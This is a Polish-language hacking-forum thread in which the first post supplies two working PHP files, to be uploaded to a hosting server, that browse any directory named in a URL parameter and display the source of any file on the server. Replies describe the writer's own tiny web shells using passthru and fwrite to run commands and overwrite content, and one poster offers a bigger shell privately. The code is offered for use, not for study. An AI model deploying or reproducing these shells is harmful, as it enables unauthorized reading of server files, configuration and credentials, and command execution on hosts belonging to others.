Pokaż wyniki 1 do 3 z 3

Temat: php hacking

  1. #1
    Zarejestrowany
    May 2007
    Postów
    32

    Domyślnie php hacking

    Dla wszystkich zainteresowanych tematem w tytule, prezentuje skrypt umożliwiający "buszowanie" po katalogach serwera z poziomu www. Należy go wstawić na serwer hostingowy i odpalić index.php. Uwaga! skrypt działa tylko na niektórych serwerach, ponieważ mają one włączone pewne zabezpieczenia w php.ini.

    ================plik index.php========================
    <?php
    $dir = $_GET['folder'];

    if (is_dir($dir)) {
    if ($uchw = opendir($dir)) {
    while (($file = readdir($uchw)) !== false) {
    if (is_dir($folder.$file))
    { echo "<a href=\"index.php?folder=$folder$file/\">
    nazwa: $file, typ: " . filetype($dir . $file) . "</a><br>\n"; }
    if (is_file($folder.$file))
    { echo "<a target=src href=\"pokaz.php?plik=$folder$file\">
    nazwa: $file, typ: " . filetype($dir . $file) . "</a><br>\n"; }
    }
    closedir($uchw);
    }
    }
    ?>
    <form action="index.php" method="GET">
    Podaj katalog z ktorego zaczac (np '/'):
    <input TYPE="text" name="folder">
    <input TYPE="submit" value="laduj zawartosc">
    </form>
    <iframe name="src" width="100%" height="400" src="pokaz.php">
    </iframe>


    ================plik pokaz.php========================
    <?PHP
    $file=$_GET['plik'];
    $kawalki = explode(".",$file);
    $ile = count($kawalki);
    $rozsz = $kawalki[$ile-1];
    if ($rozsz=="php") { @show_source($file); }
    if ($rozsz!="php") { @header("Location: ". $file); }
    ?>
    </span>

  2. #2
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    dużo błędów, ale ja i tak pisze swoje własne, 5-linijkowe mini shelle
    -dir
    -fread
    -passthru
    -own(fwrite+moja treść^^)

  3. #3
    Avatar michalski007
    michalski007 jest offline michalski
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie re:

    ten shell jest troche mało wystarczający, mam troche inny, jesli ktos jest zainteresowany pisac na priv. przesle go mailem bo jest dosc długi i rozbudowany.

Podobne wątki

  1. Hacking serwerów TeamSpeak
    By WuJ3k in forum /dev/null
    Odpowiedzi: 1
    Autor: 05-23-2007, 21:26
  2. Trojan, Hacking...:D:D
    By Joda in forum Wirusy/Konie trojańskie
    Odpowiedzi: 8
    Autor: 05-03-2007, 17:03
  3. Hacking to database
    By Nunk in forum Hacking
    Odpowiedzi: 4
    Autor: 03-04-2007, 10:57
  4. Hacking pomocy!!
    By eryk in forum Hacking
    Odpowiedzi: 9
    Autor: 02-25-2007, 11:37
  5. hack hacking.pl
    By kosiarz in forum Security
    Odpowiedzi: 13
    Autor: 01-22-2007, 15:58

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52